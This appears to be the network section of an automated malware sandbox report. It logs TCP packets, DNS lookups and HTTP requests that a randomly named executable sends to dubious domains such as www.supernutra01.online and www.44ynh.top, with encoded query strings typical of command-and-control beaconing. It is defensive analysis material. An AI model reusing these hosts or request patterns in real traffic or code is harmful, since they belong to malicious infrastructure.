                                                                Dec 11, 2024 15:05:18.323905945 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:18.443568945 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:23.741909027 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:23.861423016 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:23.861525059 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:23.873699903 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:23.993215084 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110471964 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110522032 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110558033 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110594034 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110598087 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110630989 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110647917 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110663891 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110697985 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110718012 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110732079 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110778093 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110778093 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110805988 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110850096 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.230357885 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.230613947 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.230678082 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.234658957 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.234694004 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.234827042 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.308602095 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.308656931 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.308702946 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.311192989 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.311239958 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.375761986 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.394182920 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.514117956 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:26.514261961 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.526210070 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.645689964 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755522013 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755563974 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755578995 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755597115 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755606890 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755620003 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755642891 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755656958 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755672932 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755686998 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755693913 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755748987 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755826950 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755842924 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755877018 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.875495911 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.875552893 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.875818968 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.879467010 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.922646999 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.947765112 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.947871923 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.948050976 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.950249910 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.950316906 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:28.040183067 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.050378084 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.170152903 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:29.170305014 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.183300972 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.302949905 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:29.303024054 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482270002 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482325077 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482383966 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482418060 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482453108 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482484102 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482484102 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482513905 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482552052 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482561111 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482665062 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482697964 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482712984 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482733965 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482780933 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.603434086 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.603507042 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.603562117 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.606111050 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.656892061 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.673841000 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.673932076 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.673975945 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.676430941 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.676481009 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.688224077 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.706547976 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.826332092 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:31.826437950 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.834573984 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.954190016 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099076033 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099139929 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099172115 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099205971 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099240065 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099272966 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099287033 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.099307060 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099332094 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.099332094 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.099369049 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099404097 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099437952 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099438906 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.101639986 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.219177961 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.219229937 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.219348907 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.223231077 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.223267078 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.223375082 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.291012049 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.291100025 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.291224957 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.293550014 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.293673992 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.294404030 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:33.413875103 CET8049995162.0.213.94192.168.2.7

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 11, 2024 15:03:31.384685040 CET5932153192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:03:31.805080891 CET53593211.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:03:48.456815958 CET5631653192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:03:49.104902983 CET53563161.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:04:03.519649029 CET5705453192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:04:04.299076080 CET53570541.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:04:12.362792015 CET5880253192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:04:13.010793924 CET53588021.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:04:27.754096031 CET6511853192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:04:28.346561909 CET53651181.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:04:42.988941908 CET4968453192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:04:43.505918026 CET53496841.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:04:51.566406012 CET5079453192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:04:52.578962088 CET5079453192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:04:52.715225935 CET53507941.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:04:52.715866089 CET53507941.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:05:06.920073986 CET5040553192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:05:07.938330889 CET5040553192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:05:08.622771025 CET53504051.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:05:08.622790098 CET53504051.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:05:23.331969023 CET6096753192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:05:23.737951040 CET53609671.1.1.1192.168.2.7
                                                                Dec 11, 2024 15:05:38.817257881 CET5835353192.168.2.71.1.1.1
                                                                Dec 11, 2024 15:05:39.444376945 CET53583531.1.1.1192.168.2.7

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 11, 2024 15:03:31.384685040 CET192.168.2.71.1.1.10x84afStandard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:03:48.456815958 CET192.168.2.71.1.1.10xfc52Standard query (0)www.prestigerugz.infoA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:03.519649029 CET192.168.2.71.1.1.10x8094Standard query (0)www.buckser.infoA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:12.362792015 CET192.168.2.71.1.1.10x5ac7Standard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:27.754096031 CET192.168.2.71.1.1.10xc05dStandard query (0)www.44ynh.topA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:42.988941908 CET192.168.2.71.1.1.10x3ae9Standard query (0)www.setwayidiomas.onlineA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:51.566406012 CET192.168.2.71.1.1.10x2e6Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:52.578962088 CET192.168.2.71.1.1.10x2e6Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:06.920073986 CET192.168.2.71.1.1.10xc21fStandard query (0)www.taxitayninh365.siteA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:07.938330889 CET192.168.2.71.1.1.10xc21fStandard query (0)www.taxitayninh365.siteA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:23.331969023 CET192.168.2.71.1.1.10xdc1eStandard query (0)www.ontherise.topA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:38.817257881 CET192.168.2.71.1.1.10x23a8Standard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 11, 2024 15:03:31.805080891 CET1.1.1.1192.168.2.70x84afNo error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:03:31.805080891 CET1.1.1.1192.168.2.70x84afNo error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:03:49.104902983 CET1.1.1.1192.168.2.70xfc52No error (0)www.prestigerugz.info217.160.0.113A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:04.299076080 CET1.1.1.1192.168.2.70x8094Name error (3)www.buckser.infononenoneA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:13.010793924 CET1.1.1.1192.168.2.70x5ac7No error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:04:13.010793924 CET1.1.1.1192.168.2.70x5ac7No error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:13.010793924 CET1.1.1.1192.168.2.70x5ac7No error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:13.010793924 CET1.1.1.1192.168.2.70x5ac7No error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:13.010793924 CET1.1.1.1192.168.2.70x5ac7No error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:13.010793924 CET1.1.1.1192.168.2.70x5ac7No error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:13.010793924 CET1.1.1.1192.168.2.70x5ac7No error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:28.346561909 CET1.1.1.1192.168.2.70xc05dNo error (0)www.44ynh.top44ynh.topCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:04:28.346561909 CET1.1.1.1192.168.2.70xc05dNo error (0)44ynh.top38.181.21.178A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:43.505918026 CET1.1.1.1192.168.2.70x3ae9Server failure (2)www.setwayidiomas.onlinenonenoneA (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:52.715225935 CET1.1.1.1192.168.2.70x2e6No error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:04:52.715225935 CET1.1.1.1192.168.2.70x2e6No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:04:52.715225935 CET1.1.1.1192.168.2.70x2e6No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:04:52.715866089 CET1.1.1.1192.168.2.70x2e6No error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:04:52.715866089 CET1.1.1.1192.168.2.70x2e6No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:04:52.715866089 CET1.1.1.1192.168.2.70x2e6No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:08.622771025 CET1.1.1.1192.168.2.70xc21fNo error (0)www.taxitayninh365.sitetaxitayninh365.siteCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:05:08.622771025 CET1.1.1.1192.168.2.70xc21fNo error (0)taxitayninh365.site103.75.185.22A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:08.622790098 CET1.1.1.1192.168.2.70xc21fNo error (0)www.taxitayninh365.sitetaxitayninh365.siteCNAME (Canonical name)IN (0x0001)false
                                                                Dec 11, 2024 15:05:08.622790098 CET1.1.1.1192.168.2.70xc21fNo error (0)taxitayninh365.site103.75.185.22A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:23.737951040 CET1.1.1.1192.168.2.70xdc1eNo error (0)www.ontherise.top162.0.213.94A (IP address)IN (0x0001)false
                                                                Dec 11, 2024 15:05:39.444376945 CET1.1.1.1192.168.2.70x23a8No error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.supernutra01.online
                                                                • www.prestigerugz.info
                                                                • www.jijievo.site
                                                                • www.44ynh.top
                                                                • www.75178.club
                                                                • www.taxitayninh365.site
                                                                • www.ontherise.top

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749819104.21.24.198804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:03:31.938921928 CET501OUTGET /q3v1/?rLx0p=06jDTp00Q&9rKHjDxP=fC5DX2ZaB+U22tqYS+31DCM0Vrm4Elo0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfcmXJHPof67iEk5v1Y4XZGEVpYnTZiVigeHb+dSitYw1T+PjPtStOlFWH8 HTTP/1.1
                                                                Host: www.supernutra01.online
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:03:33.292248964 CET1236INHTTP/1.1 200 OK
                                                                Date: Wed, 11 Dec 2024 14:03:33 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                                Accept-Ranges: bytes
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxaeBUiAYCAoC1iXM%2Fqx82t32rgDE9jqZkvf%2BYKjDQEIDVzVx6KcUcrbdPS%2BPqSe4yV6yQO9wSjdlxUOa0lvOfVrbpjYXBZv2uvG99jb2fiy7W6Y9MeDzGfkzmhTwSyln7LfZYbKt6SGlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8f0604ca7f1d5e70-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                                Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,l
                                                                Dec 11, 2024 15:03:33.292359114 CET224INData Raw: 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f
                                                                Data Ascii: abel{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}bo
                                                                Dec 11, 2024 15:03:33.292371035 CET1236INData Raw: 64 79 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a
                                                                Data Ascii: dy{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}butt
                                                                Dec 11, 2024 15:03:33.292484045 CET1236INData Raw: 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 37 37 37 37 37 37 37 37 38 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f
                                                                Data Ascii: weight:500;line-height:1.2777777778}.window-main__title::before{content:"";position:absolute;bottom:0;left:50%;height:2px;width:8rem;background-color:#15b4fc;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.window-main__body{line
                                                                Dec 11, 2024 15:03:33.292690992 CET448INData Raw: 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 35 36 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b
                                                                Data Ascii: {margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__item{padding-left:.75rem}.window-main__actions{margin-top:1.5rem}}@media (max-width:29.99875em){.window-main .svg-one{top:-330px}.window-main .svg-two{bottom:-423px;l
                                                                Dec 11, 2024 15:03:33.292704105 CET1236INData Raw: 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34
                                                                Data Ascii: 29.0243902439vw ,8.9375rem)}}@supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.304878048
                                                                Dec 11, 2024 15:03:33.292714119 CET1236INData Raw: 39 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2e 39 31 34 36 33 34 31 34 36 33 72 65 6d
                                                                Data Ascii: 9268292683vw ,2.25rem)){.window-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(
                                                                Dec 11, 2024 15:03:33.292726994 CET1236INData Raw: 2d 6c 65 66 74 3a 63 61 6c 63 28 2e 35 36 32 35 72 65 6d 20 2b 20 2e 31 32 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70
                                                                Data Ascii: -left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75rem ,.6524390244rem + .487804878vw ,.875rem)}}@supports not (paddi
